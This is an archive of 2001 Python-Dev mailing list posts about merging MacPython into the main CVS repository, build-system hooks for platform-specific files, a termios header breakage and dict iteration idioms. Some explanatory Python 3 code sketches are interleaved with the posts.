raise KeyError("arb passed an empty dict") > If neither, would this be useful, or is it DHG? Do you have a particular algorithm, or class of algorithms, in mind for which it is useful? 
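Tim's second `arb()` relies on `dict.iteritems()`, which exists only in Python 2. The following hedged Python 3 sketch illustrates the distinction he draws (function names are hypothetical): `arb` returns an arbitrary entry without touching the dict, while `random_item` gives every entry the same probability but must first build a list of all items, which is why "random" costs more than "arbitrary".

```python
import random


def arb(d):
    """Return an arbitrary (key, value) pair of d without mutating it."""
    # Python 3 spelling of the iteritems().next() version.
    for pair in d.items():
        return pair
    raise KeyError("arb passed an empty dict")


def random_item(d):
    """Return a uniformly chosen (key, value) pair; O(len(d)) per call."""
    if not d:
        raise KeyError("random_item passed an empty dict")
    return random.choice(list(d.items()))


d = {"a": 1, "b": 2, "c": 3}
print(arb(d))          # some entry of d; d itself is unchanged
print(random_item(d))  # each entry with probability 1/3
```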
popitem's current behavior is most useful for me in the set algorithms I've used, usually in the form:

    while working_set:
        x, dontcare = working_set.popitem()
        process(x)  # which may add more elts to working_set

From jack at oratrix.nl Mon May 7 11:39:43 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:39:43 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Folks, now that there's finally a decent (well, somewhat decent:-) Mac CVS client that supports ssh I'd like to move MacPython to sourceforge. There's two ways I can go about this: start a new MacPython project or merge the MacPython stuff into the main Python CVS repository. The Mac specific stuff for Python is all concentrated in a single subtree Mac of the main Python tree (the subtree has its own hierarchy of Python/Modules/Lib/etc directories), so putting it in the main repository should not pollute the filenamespace all that much. It would also have the advantage that a single "cvs update" would update everything (whereas the current situation for Mac developers, where Python/Mac is from a different CVSROOT than Python, does not have that advantage). The downside is that everyone who does a full checkout of the tree would get an extra 1000 or so files on their disk that are pretty useless unless they have a mac. Oh yes, another plus for putting stuff in the main repository is MacOSX support. Some MacPython modules have been "ported" to MacOSX, and I've started on adding them to setup.py, and life would become a lot simpler for people compiling on MacOSX if they had everything available automatically.
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack at oratrix.nl Mon May 7 11:45:59 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:45:59 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core Message-ID: <20010507094600.217CE312BA0@snelboot.oratrix.nl> To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup of Python does not allow for an easy addition of a platform-dependent sourcefile to the core interpreter (or am I missing something?). This is a bit of functionality I need to port the various Mac modules to MacOSX-python. The platform-dependent sourcefile has various glue routines for turning MacOS error codes into exceptions and that sort of stuff. Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From jack at oratrix.nl Mon May 7 11:49:17 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 11:49:17 +0200 Subject: [Python-Dev] Need a search path for modules in setup.py Message-ID: <20010507094917.A8CBF312BA0@snelboot.oratrix.nl> (Don't worry, this is the last in my flurry of OSX-related messages:-) Life would be a lot simpler for me if setup.py (the one for the main extension modules) would have a search path for module sourcefiles. As Mac modules currently live in Python/Mac/Modules (as opposed to Python/Modules) not having a search path means I get ugly "../Mac/Modules/foomodule.c" constructs. I have the code for setup.py ready, is it OK if I check it in?
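A search path of the kind Jack asks for could look roughly like this. It is a minimal sketch, not the code he has ready: the helper name find_module_source() and the directory list are hypothetical, and a real setup.py would feed the result into its extension definitions.

```python
import os


def find_module_source(filename, search_dirs):
    """Return the path to `filename` in the first directory of `search_dirs`
    that contains it, or None if no directory does.

    Hypothetical helper: earlier directories take precedence, so a file in
    Modules/ shadows one with the same name in Mac/Modules/.
    """
    for directory in search_dirs:
        candidate = os.path.join(directory, filename)
        if os.path.isfile(candidate):
            return candidate
    return None


# Hypothetical search path, relative to the top of the source tree.
MODULE_SEARCH_PATH = ["Modules", os.path.join("Mac", "Modules")]
```

With such a path, a module list could name just "foomodule.c" and let the lookup find it under Mac/Modules, instead of hard-coding "../Mac/Modules/foomodule.c".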
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | ++++ see http://www.xs4all.nl/~tank/ ++++ From loewis at informatik.hu-berlin.de Mon May 7 11:53:54 2001 From: loewis at informatik.hu-berlin.de (Martin von Loewis) Date: Mon, 7 May 2001 11:53:54 +0200 (MEST) Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> > There's two ways I can go about this: start a new MacPython project > or merge the MacPython stuff into the main Python CVS repository. There is actually a third option: Use the Python SF project, but create a new module in the Python CVS repository (so no merging would be done). I don't know how much code this is. I'd favour merging the Mac code into the core distribution. If there are loads of Mac-specific modules that not every MacPython user needs, it might be advisable to create a distutils package that contains the extra modules. Such a package should still live in cvs.python.sourceforge.net:/cvsroot/python. Just my 0.02EUR, Martin From guido at digicool.com Mon May 7 16:00:08 2001 From: guido at digicool.com (Guido van Rossum) Date: Mon, 07 May 2001 09:00:08 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Your message of "Mon, 07 May 2001 11:53:54 +0200." <200105070953.LAA14803@pandora.informatik.hu-berlin.de> References: <200105070953.LAA14803@pandora.informatik.hu-berlin.de> Message-ID: <200105071400.JAA25627@cj20424-a.reston1.va.home.com> [Jack] > > There's two ways I can go about this: start a new MacPython project > > or merge the MacPython stuff into the main Python CVS repository. We have platform-specific subdirectories for so many projects that it's a shame we don't have the Mac code in there as well! 
The only (small) advantage I can imagine of a separate MacPython project would be that you (Jack) can more easily give others commit permission to the Mac tree without giving them commit permission to all of Python (which requires they gain the trust of a larger group of Python developers). Of course, I don't know if you expect much help from others who are not already Python developers. [Martin] > There is actually a third option: Use the Python SF project, but > create a new module in the Python CVS repository (so no merging would > be done). I don't know much about modules, but would this allow Jack to check out the main code and the MacPython code into a single work directory (which he needs)? If so, it may be the best solution. Note that no matter how you do it, you'll have to submit a tree of RCS files to the SF sysadmins to load, unless you want to lose years of MacPython cvs logs... > I don't know how much code this is. I'd favour merging the Mac code > into the core distribution. If there are loads of Mac-specific modules > that not every MacPython user needs, it might be advisable to create a > distutils package that contains the extra modules. Such a package > should still live in cvs.python.sourceforge.net:/cvsroot/python. Undecidedly yours, (Jack, regarding your Makefile and setup.py changes: I'd wait for opinions on your patches from Neil and Andrew. I don't see why they would have an objection to adding these features, but the specific implementation you propose might be subject to comments.) --Guido van Rossum (home page: http://www.python.org/~guido/) From skip at pobox.com Mon May 7 15:04:15 2001 From: skip at pobox.com (skip at pobox.com) Date: Mon, 7 May 2001 08:04:15 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl> References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <15094.40271.461338.638822@beluga.mojam.com> Jack> ... 
I'd like to move MacPython to sourceforge. There's two ways I Jack> can go about this: start a new MacPython project or merge the Jack> MacPython stuff into the main Python CVS repository. I say merge. Skip From nas at python.ca Mon May 7 15:14:52 2001 From: nas at python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:14:52 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507094600.217CE312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:45:59AM +0200 References: <20010507094600.217CE312BA0@snelboot.oratrix.nl> Message-ID: <20010507061452.A23494@glacier.fnational.com> Jack Jansen wrote: > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > of Python does not allow for an easy addition of a platform-dependent > sourcefile to the core interpreter (or am I missing something?). No, it's still a big ugly hack. :-) > This is a bit of functionality I need to port the various Mac > modules to MacOSX-python. The platform-dependent sourcefile has > various glue routines for turning MacOS error codes into > exceptions and that sort of stuff. > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? How would this work? Would MACHDEP_OBJS be set by an autoconf substitution? Neil From jack at oratrix.nl Mon May 7 15:17:18 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:17:18 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Guido van Rossum , Mon, 07 May 2001 09:00:08 -0500 , <200105071400.JAA25627@cj20424-a.reston1.va.home.com> Message-ID: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> > We have platform-specific subdirectories for so many projects that > it's a shame we don't have the Mac code in there as well! Great! I'll pack up my repository and send it to the sourceforge-powers-that-be shortly.
The write permission for other MacPython developers shouldn't be a problem; I think Just is currently the only person with write permission (but I have to check). > (Jack, regarding your Makefile and setup.py changes: I'd wait for > opinions on your patches from Neil and Andrew. I don't see why > they would have an objection to adding these features, but the > specific implementation you propose might be subject to comments.) Definitely. I'll put them up as patches and then see what happens. -- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From jack at oratrix.nl Mon May 7 15:27:14 2001 From: jack at oratrix.nl (Jack Jansen) Date: Mon, 07 May 2001 15:27:14 +0200 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: Message by Neil Schemenauer , Mon, 7 May 2001 06:14:52 -0700 , <20010507061452.A23494@glacier.fnational.com> Message-ID: <20010507132714.B0808312BA1@snelboot.oratrix.nl> > Jack Jansen wrote: > > To my surprise I noticed that the whole configure/Makefile.pre.in/setup setup > > of Python does not allow for an easy addition of a platform-dependent > > sourcefile to the core interpreter (or am I missing something?). > [...] > > > > Is it OK if I add a MACHDEP_OBJS to PYTHON_OBJS? > > How would this work? Would MACHDEP_OBJS be set by an autoconf > substitution? Yes, that's what I had in mind (haven't written the code yet). Similar to the way DYNLOADFILE is set, but empty for all platforms except for OSX.
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From nas at python.ca Mon May 7 15:30:42 2001 From: nas at python.ca (Neil Schemenauer) Date: Mon, 7 May 2001 06:30:42 -0700 Subject: [Python-Dev] Added a machine-dependent file to the core In-Reply-To: <20010507132714.B0808312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:27:14PM +0200 References: <20010507132714.B0808312BA1@snelboot.oratrix.nl> Message-ID: <20010507063042.D23494@glacier.fnational.com> Jack Jansen wrote: > Yes, that's what I had in mind (haven't written the code yet). Similar to the > way DYNLOADFILE is set, but empty for all platforms except for OSX. Sounds good to me. Try to keep the code somewhat general so that other platforms may use it. Neil From mal at lemburg.com Mon May 7 20:44:55 2001 From: mal at lemburg.com (M.-A. Lemburg) Date: Mon, 07 May 2001 20:44:55 +0200 Subject: [Python-Dev] "data".decode(encoding) ?! References: <3AF04E3D.45AE4F4B@lemburg.com> <200105021918.OAA03080@cj20424-a.reston1.va.home.com> <3AF052CE.E928BDA1@lemburg.com> <200105021938.OAA03550@cj20424-a.reston1.va.home.com> <3AF0662D.48671B4E@lemburg.com> <200105051145.GAA14831@cj20424-a.reston1.va.home.com> Message-ID: <3AF6ED27.FB2C077B@lemburg.com> Guido van Rossum wrote: > > > I've attached the patch. Due to a small reorganisation the > > patch is a little longer -- symmetry has its price at C level > > too ;-) > > Looks good on paper, so go ahead and check it in. Watch out for > potential changes caused by Tim's iter-crusade! :-) OK. I'll look into this later this week. > While you're at it, why don't you check in the rot13 codec you posted > -- it's good to have simple examples in the standard library.
> It would also be cool to have codecs for common file encodings like > base64, quoted-printable, binhex, uuencode, and even hex > (binascii.hexlify). Right. I'll add these in the next few weeks -- as time comes along. -- Marc-Andre Lemburg ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From martin at loewis.home.cs.tu-berlin.de Mon May 7 23:21:27 2001 From: martin at loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 7 May 2001 23:21:27 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge Message-ID: <200105072121.f47LLRc01252@mira.informatik.hu-berlin.de> > I don't know much about modules, but would this allow Jack to check > out the main code and the MacPython code into a single work > directory (which he needs)? Using CVS modules allows you to merge parts of the tree into a single sandbox. E.g. you could do

    macpython python/dist/src &Mac

'cvs co macpython' then would give you a dist/src directory, which also contains a Mac directory (where Mac is another module, alongside /python, or a CVSROOT/modules entry). You could use an exclude list, e.g.

    macpython !PC !PCbuild !RISCOS python/dist/src &Mac

What you *cannot* do is to merge modules on a per-directory basis; all files in a single directory must come from the same CVS module - you can think of ampersand modules as similar to Unix mount(1)ed file systems. Regards, Martin From tim.one at home.com Tue May 8 06:14:22 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 8 May 2001 00:14:22 -0400 Subject: [Python-Dev] Help with SF bug 105470 Message-ID: An ancient bug just got (re?)discovered on c.l.py, which I entered into SF: http://sourceforge.net/tracker/?func=detail&aid=422177&group_id=5470&atid=105470 This has to do w/ gross loss of precision in manifest Python float constants, if and only if a module is loaded from .pyc or .pyo format.
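The report does not spell out the mechanism. As a general illustration only (an assumption, not a description of what the actual bug or its patch does), the snippet shows how a float written out with too few significant digits, as a %.12g-style conversion does, comes back as a different number. Seventeen significant digits, which always suffice for an IEEE 754 double, or a binary marshal round trip preserve it exactly.

```python
import marshal


def round_trips(x, fmt):
    """True if formatting x with the %-format `fmt` and parsing it back
    with float() reproduces x exactly."""
    return float(fmt % x) == x


x = 0.1 + 0.2
print("%.12g" % x)              # 0.3  (12 significant digits: precision lost)
print("%.17g" % x)              # 0.30000000000000004
print(round_trips(x, "%.12g"))  # False
print(round_trips(x, "%.17g"))  # True
print(marshal.loads(marshal.dumps(x)) == x)  # True: binary round trip
```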
Since it's fp-related, and fp is tricky x-platform, I'd like some volunteers to test this before I check it in. Current CVS Python contains a dormant test case. There's a patch attached to the bug report that activates the test case, and tries to repair the problem. With the patch applied, the fix works if and only if test_import passes both after deleting all .pyc/.pyo files first and when run a second time without deleting them. Works on Win98SE, but you may have already guessed that. From tim.one at home.com Tue May 8 06:52:37 2001 From: tim.one at home.com (Tim Peters) Date: Tue, 8 May 2001 00:52:37 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Message-ID: [Jeremy Hylton, on python-checkins] > ... > XXX When should nested scopes be made non-optional on the trunk? Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're having trouble sleeping tonight. From thomas at xs4all.net Tue May 8 12:14:20 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 12:14:20 +0200 Subject: [Python-Dev] Multiple inheritance In-Reply-To: <15090.64389.746625.331215@anthem.wooz.org>; from barry@digicool.com on Fri, May 04, 2001 at 02:57:09PM -0400 References: <20010503131714.D21814@inetnebr.com> <15090.64389.746625.331215@anthem.wooz.org> Message-ID: <20010508121420.Y16486@xs4all.nl> On Fri, May 04, 2001 at 02:57:09PM -0400, Barry A. Warsaw wrote: > >>>>> "JE" == Jeff Epler writes: > | Why not let us spell this as: > | class X(Y): > | from Y import foo as _sfoo, bar as _sbar > | ... > NS> This already has a meaning in Python. Paul's suggested syntax > NS> is pretty neat, IMHO. > Not if Y is a class though, right? That would currently raise an > ImportError, ... Nope:

    >>> class string:
    ...     pass
    ...
    >>> from string import split
    >>> string
    >>>

That could be considered a misfeature for more than one reason (like importing from non-module objects, which you now do by inserting the object into sys.modules) but can't be fixed without breaking backward compatibility, except by inventing new syntax. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From Mark.Favas at per.dem.csiro.au Tue May 8 12:34:37 2001 From: Mark.Favas at per.dem.csiro.au (Favas, Mark (EM, Floreat)) Date: Tue, 8 May 2001 18:34:37 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> A change to termios.c in the last couple of days to #include termio.h as well as termios.h breaks the build on FreeBSD, which has only termios.h - needs an autoconf test? There'll probably be other similar systems. Cheers, Mark From thomas at xs4all.net Tue May 8 13:36:38 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 13:36:38 +0200 Subject: [Python-Dev] non-mutating 'choose' to go with 'dict.popitem'? In-Reply-To: ; from tim.one@home.com on Sun, May 06, 2001 at 02:15:57PM -0400 References: <930BBCA4CEBBD411BE6500508BB3328F27B30E@nsamcanms1.ca.baltimore.com> Message-ID: <20010508133638.Z16486@xs4all.nl> On Sun, May 06, 2001 at 02:15:57PM -0400, Tim Peters wrote: > Given the new dict iterators in 2.2, there's an easier fast way that doesn't > mutate the dict even under the covers:

> def arb(dict):
>     if dict:
>         return dict.iteritems().next()
>     raise KeyError("arb passed an empty dict")

You probably want:

    arb = dict.iteritems().next

so that you don't keep on returning the same key,value pair. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread!
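In today's Python 3, which postdates this thread (so this is a translation, not what was discussed), dict.iteritems() is gone and iterators are advanced with next(). The sketch restates Tim's two arb() variants. It also illustrates Thomas's point that a single stored iterator's __next__ walks through successive pairs until StopIteration, and shows that CPython 3 raises RuntimeError when a dict changes size under a live iterator. reachable() is a hypothetical example of the popitem()-driven worklist loop Tim describes, where the working set grows while it is being drained.

```python
def arb(d):
    """Arbitrary (key, value) pair without mutating d (Python 3 spelling
    of the 2.2 iterator-based version)."""
    if d:
        return next(iter(d.items()))
    raise KeyError("arb passed an empty dict")


def arb_popitem(d):
    """popitem-and-restore variant: briefly removes an entry, then puts it back."""
    k, v = pair = d.popitem()
    d[k] = v  # restore the entry
    return pair


def reachable(graph, start):
    """Worklist loop in the popitem() style: processing x may add more
    elements to working_set, which is safe because popitem() is called
    afresh on each pass rather than through a long-lived iterator."""
    seen = set()
    working_set = {start: None}  # dict used as a set, as in the thread
    while working_set:
        x, _dontcare = working_set.popitem()
        seen.add(x)
        for y in graph.get(x, ()):
            if y not in seen:
                working_set[y] = None
    return seen


# A stored bound __next__ returns *successive* pairs, then StopIteration.
d = {"a": 1, "b": 2}
nxt = iter(d.items()).__next__
print(nxt(), nxt())  # ('a', 1) ('b', 2)

# Changing the dict's size under a live iterator is an error in CPython 3.
it = iter(d.items())
d["c"] = 3
try:
    next(it)
except RuntimeError as exc:
    print(exc)  # dictionary changed size during iteration
```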
From thomas at xs4all.net Tue May 8 14:10:00 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:10:00 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507093944.1A340312BA0@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 11:39:43AM +0200 References: <20010507093944.1A340312BA0@snelboot.oratrix.nl> Message-ID: <20010508141000.A16486@xs4all.nl> On Mon, May 07, 2001 at 11:39:43AM +0200, Jack Jansen wrote: > The Mac specific stuff for Python is all concentrated in a single subtree Mac > of the main Python tree (the subtree has its own hierarchy of > Python/Modules/Lib/etc directories), so putting it in the main repository > should not pollute the filenamespace all that much. It would also have the > advantage that a single "cvs update" would update everything (whereas the > current situation for Mac developers, where Python/Mac is from a different > CVSROOT than Python, does not have that advantage). The downside is that > everyone who does a full checkout of the tree would get an extra 1000 or so > files on their disk that are pretty useless unless they have a mac. I'd say merge, except that the number '1000' is very large. Is it really 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 .py files spread out over the tree (567 of which in Lib, the rest in Demo/Tools) and obviously some misc files and CVS stuff, for a total of around 2500 files. Is that 1000 a real number ? No temp files, auto-generated files, .o files etc ? How large are they ? (the average size in the current CVS tree is about 10k) I'd probably still say 'merge', I'm just curious where the large number of files comes from. Is it to keep the changes to the original files minimal ? Given the number of platform-dependent #ifdefs and differently-defined macros we're using now, I don't see why some of those changes couldn't be moved into the original files, if that's the case. -- Thomas Wouters Hi!
I'm a .signature virus! copy me into your .signature file to help me spread! From thomas at xs4all.net Tue May 8 14:13:39 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 14:13:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010507131718.C22B7312BA1@snelboot.oratrix.nl>; from jack@oratrix.nl on Mon, May 07, 2001 at 03:17:18PM +0200 References: <20010507131718.C22B7312BA1@snelboot.oratrix.nl> Message-ID: <20010508141339.B16486@xs4all.nl> On Mon, May 07, 2001 at 03:17:18PM +0200, Jack Jansen wrote: > > We have platform-specific subdirectories for so many projects that > > it's a shame we don't have the Mac code in there as well! > Great! I'll pack up my repository and send it to the > sourceforge-powers-that-be shortly. The write permission for other MacPython > developers shouldn't be a problem, I think Just is currently the only person > with write permission (but I have to check). That doesn't mean there isn't a problem. Just doesn't have write access :) -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From guido at digicool.com Tue May 8 15:35:50 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:35:50 -0500 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: Your message of "Tue, 08 May 2001 00:52:37 -0400." References: Message-ID: <200105081335.IAA28415@cj20424-a.reston1.va.home.com> > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes be made non-optional on the trunk? [Tim] > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > having trouble sleeping tonight. +1.
--Guido van Rossum (home page: http://www.python.org/~guido/) From guido at digicool.com Tue May 8 15:41:42 2001 From: guido at digicool.com (Guido van Rossum) Date: Tue, 08 May 2001 08:41:42 -0500 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: Your message of "Tue, 08 May 2001 18:34:37 +0800." <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> Message-ID: <200105081341.IAA28486@cj20424-a.reston1.va.home.com> > A change to termios.c in the last couple of days to #include termio.h as > well as termios.h breaks the build on FreeBSD, which has only termios.h - > needs an autoconf test? There'll probably be other similar systems. Frankly, I don't see the point of including termio.h at all -- it seems to be a backwards compatibility file. Mark, can you please enter this in the bug database and assign it to whoever checked in the change? :-) --Guido van Rossum (home page: http://www.python.org/~guido/) From nas at python.ca Tue May 8 16:05:01 2001 From: nas at python.ca (Neil Schemenauer) Date: Tue, 8 May 2001 07:05:01 -0700 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Python compile.c,2.198,2.199 In-Reply-To: ; from tim.one@home.com on Tue, May 08, 2001 at 12:52:37AM -0400 References: Message-ID: <20010508070501.A25794@glacier.fnational.com> Tim Peters wrote: > [Jeremy Hylton, on python-checkins] > > ... > > XXX When should nested scopes be made non-optional on the trunk? > > Since the trunk is 2.2a0, as soon as it's convenient. Like, say, if you're > having trouble sleeping tonight. Shouldn't the entry in the __future__ file be:

    nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "alpha", 0))

or am I misunderstanding something?
Neil From jack at oratrix.nl Tue May 8 16:07:39 2001 From: jack at oratrix.nl (Jack Jansen) Date: Tue, 08 May 2001 16:07:39 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: Message by Thomas Wouters , Tue, 8 May 2001 14:10:00 +0200 , <20010508141000.A16486@xs4all.nl> Message-ID: <20010508140741.790E5379B72@snelboot.oratrix.nl> > I'd say merge, except that the number '1000' is very large. Is it really > 1000 ? The current Python tree contains only 304 .c and .h files, about 1000 > .py files spread out over the tree (567 of which in Lib, the rest in > Demo/Tools) and obviously some misc files and CVS stuff, for a total of > around 2500 files. Is that 1000 a real number ? No temp files, > auto-generated files, .o files etc ? How large are they ? (the average size > in the current CVS tree is about 10k) It's actually 830 files. This is 320 .py files (130 in Lib, the rest in Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build system), 30 resource files and then assorted things (html documentation, scripts to drive the distribution builder, etc). The .xml and .exp files and about 20 of the .c files are machine generated, so they could technically be left out of the repository. The generation process of these files is a bit painful, though, so I've added them as a convenience (the reasoning is a bit along the lines of the Grammar stuff of the core). The one thing that I should do is clean out the "Unsupported" directory before doing the merge. It contains some stuff that is long dead. But then, it isn't all that many files. 
-- Jack Jansen | ++++ stop the execution of Mumia Abu-Jamal ++++ Jack.Jansen at oratrix.com | ++++ if you agree copy these lines to your sig ++++ www.oratrix.nl/~jack | see http://www.xs4all.nl/~tank/spg-l/sigaction.htm From mwh at python.net Tue May 8 16:41:45 2001 From: mwh at python.net (Michael Hudson) Date: Tue, 8 May 2001 15:41:45 +0100 (BST) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD Message-ID: Guido van Rossum writes: > > A change to termios.c in the last couple of days to #include termio.h > > as well as termios.h breaks the build on FreeBSD, which has only > > termios.h - needs an autoconf test? There'll probably be other similar > > systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. If you don't include termio.h the build breaks on alpha/OSF1. This sounds to me like OSF1's headers are broken (you can't include sys/ioctl.h without including termio.h first, it seems, or you get complaints about struct termio being undefined). So I'd suggest

    +#ifdef __osf__
     #include <termio.h>
    +#endif

and then see if the build breaks anywhere else (I love unix). Using the sf compile farm, I've tested this on FreeBSD, Linux/x86, Linux/PPC, OSF1/alpha, Linux/sparc, Solaris/sparc (using gcc; cc gives a pile of warnings from redefined macros and then dies 'cause it can't find a valid license file). So we might need some more magic for Solaris using cc. Cheers, M. -- Imagine if every Thursday your shoes exploded if you tied them the usual way. This happens to us all the time with computers, and nobody thinks of complaining. -- Jeff Raskin From fdrake at acm.org Tue May 8 16:45:18 2001 From: fdrake at acm.org (Fred L. Drake, Jr.)
Date: Tue, 8 May 2001 10:45:18 -0400 (EDT) Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD In-Reply-To: References: Message-ID: <15096.1662.137269.996490@cj42289-a.reston1.va.home.com> Michael Hudson writes: > If you don't include termio.h the build breaks on alpha/OSF1. This > sounds to me like OSF1's headers are broken (you can't include > sys/ioctl.h without including termio.h first, it seems, or you get > complaints about struct termio being undefined). So I'd suggest > > +#ifdef __osf__ > #include <termio.h> > +#endif > > and then see if the build breaks anywhere else (I love unix). Does it make more sense to do this or to test for termio.h in configure? -Fred -- Fred L. Drake, Jr. PythonLabs at Digital Creations From m.favas at per.dem.csiro.au Tue May 8 16:47:39 2001 From: m.favas at per.dem.csiro.au (Mark Favas) Date: Tue, 08 May 2001 22:47:39 +0800 Subject: [Python-Dev] Recent change to termios module breaks build on FreeBSD References: <51716131991ED5118CDE00B0D02351865ED2@moort.wa.CSIRO.AU> <200105081341.IAA28486@cj20424-a.reston1.va.home.com> Message-ID: <3AF8070B.87D3C5B2@per.dem.csiro.au> Guido van Rossum wrote: > > > A change to termios.c in the last couple of days to #include termio.h as > > well as termios.h breaks the build on FreeBSD, which has only termios.h - > > needs an autoconf test? There'll probably be other similar systems. > > Frankly, I don't see the point of including termio.h at all -- it > seems to be a backwards compatibility file. > > Mark, can you please enter this in the bug database and assign it to > whoever checked in the change?
:-) Done - Michael Hudson wrote the patch, so I've assigned the bug to Fred Drake -- Mark Favas - m.favas at per.dem.csiro.au CSIRO, Private Bag No 5, Wembley, Western Australia 6913, AUSTRALIA From thomas at xs4all.net Tue May 8 17:52:49 2001 From: thomas at xs4all.net (Thomas Wouters) Date: Tue, 8 May 2001 17:52:49 +0200 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl>; from jack@oratrix.nl on Tue, May 08, 2001 at 04:07:39PM +0200 References: <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <20010508175248.E16486@xs4all.nl> On Tue, May 08, 2001 at 04:07:39PM +0200, Jack Jansen wrote: [ Jack wants to add the +/- 1000 extra files from the MacPython source tree to the Python CVS repository ] > It's actually 830 files. This is 320 .py files (130 in Lib, the rest in > Tools/scripts/etc) 120 .c/.h files, 110 XML and exp files (for the build > system), 30 resource files and then assorted things (html documentation, > scripts to drive the distribution builder, etc). I'd say merge it. If there had been decent CVS clients for the mac when you started, those files would have been in the CVS tree already. -- Thomas Wouters Hi! I'm a .signature virus! copy me into your .signature file to help me spread! From skip at pobox.com Tue May 8 20:22:17 2001 From: skip at pobox.com (skip at pobox.com) Date: Tue, 8 May 2001 13:22:17 -0500 Subject: [Python-Dev] Moving MacPython to sourceforge In-Reply-To: <20010508140741.790E5379B72@snelboot.oratrix.nl> References: <20010508141000.A16486@xs4all.nl> <20010508140741.790E5379B72@snelboot.oratrix.nl> Message-ID: <15096.14681.773554.729550@beluga.mojam.com> Jack> It's actually 830 files. ... 120 .c/.h files ... How many of those 120 files are variants of existing source files that (in theory) could be merged with their mainline counterparts? 
